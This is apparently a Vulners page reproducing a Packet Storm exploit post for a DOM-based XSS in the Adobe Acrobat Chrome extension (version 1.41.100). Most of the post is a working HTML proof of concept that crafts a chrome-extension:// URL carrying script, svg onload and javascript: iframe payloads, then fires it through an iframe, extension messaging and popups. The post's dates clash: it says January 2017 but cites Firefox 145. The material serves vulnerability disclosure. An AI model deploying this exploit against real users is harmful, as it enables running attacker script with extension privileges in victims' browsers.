Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Adobe Acrobat Chrome 1.41.100 Cross Site Scripting

🗓️ 09 Dec 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 148 Views

Adobe Acrobat Chrome extension DOM XSS lets attackers run code in the extension context via unsanitized JSON data.

Code
=============================================================================================================================================
    | # Title     : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj                         |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212491/ 
    
    [+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
                  DOM-based XSS condition. Malicious payloads are executed inside the extension context.
    
    [+] Date: January 2017
    
        Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)
    
        Type: DOM-based Cross-Site Scripting (XSS)
    
        Users Affected: ~30 million installations (via forced auto-update)
    	
    [+] Technical Details:
    
    The extension receives JSON data and renders dynamic HTML without 
    proper sanitization. The vulnerable code accepts untrusted strings
    and injects them into the DOM using innerHTML.
    
    [+] Impact:
    An attacker can execute arbitrary JavaScript within the extension
    context, bypassing browser Same Origin Policy and triggering 
    extension-level privileges.
    
    [+] Exploit (PoC):
    The following sanitized PoC demonstrates the XSS trigger behavior.
    
    Steps to Reproduce:
    1. Install Adobe Acrobat Chrome Extension.
    2. Visit a crafted local HTML page.
    3. Observe execution of JavaScript inside the frame context.
    
    Save Instructions:
    Code below should be saved in `poc.html` and opened locally.
    
    Execution:
    Open `poc.html` in Chrome with the extension installed. Observe
    console logs confirming rendering inside the extension's frame.
    
    [+]  POC :	
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>Adobe Acrobat XSS Exploit</title>
    </head>
    <body>
        <h2>Adobe Acrobat Extension DOM XSS Exploit</h2>
        
        <div id="exploit-container"></div>
        
        <script>
        // Extension ID and vulnerable page
        const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
        const VULNERABLE_PAGE = 'data/js/frame.html';
        
        function createExploit() {
            // Advanced XSS payload with multiple vectors
            const payload = {
                panel_op: "status",
                current_status: "failure",
                message: `
                    <div style="background:red;color:white;padding:20px;">
                        <h1>XSS EXECUTED</h1>
                        <p>Domain: <script>document.write(document.domain)</script></p>
                        <svg/onload="alert('POC By Indoushka: ' + location.href)">
                    </div>
                    <iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
                `.replace(/\n/g, ' ').trim()
            };
            
            // URL encode the payload
            const encodedPayload = encodeURIComponent(JSON.stringify(payload));
            const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;
            
            return exploitUrl;
        }
        
        function executeExploit() {
            const exploitUrl = createExploit();
            
            // Method 1: Try with iframe sandbox bypass
            const iframe = document.createElement('iframe');
            iframe.sandbox = 'allow-scripts allow-same-origin';
            iframe.src = exploitUrl;
            iframe.style.width = "500px";
            iframe.style.height = "400px";
            iframe.style.border = "3px solid red";
            
            document.getElementById('exploit-container').appendChild(iframe);
            
            console.log('Exploit URL:', exploitUrl);
            
            // Method 2: Try to trigger via extension messaging
            setTimeout(() => {
                try {
                    // Try to communicate with the extension
                    chrome.runtime.sendMessage(EXTENSION_ID, { 
                        type: 'trefoil_html_convert',
                        data: payload 
                    }, response => {
                        console.log('Extension response:', response);
                    });
                } catch(e) {
                    console.log('Direct messaging failed:', e.message);
                }
            }, 1000);
            
            // Method 3: Create a popup with user gesture
            document.body.onclick = function() {
                window.open(exploitUrl, '_blank', 'width=600,height=400');
            };
        }
        
        // Execute exploit after page load
        window.onload = executeExploit;
        
        // Alternative: Use button with user gesture
        document.body.innerHTML += `
            <button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
                Click to Trigger Exploit (User Gesture Required)
            </button>
        `;
        </script>
    </body>
    </html>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Dec 2025 00:00Current
6.3Medium risk
Vulners AI Score6.3
adobe acrobat chromedom xssunsanitized jsonextension contextsame origin policycross site scripting
148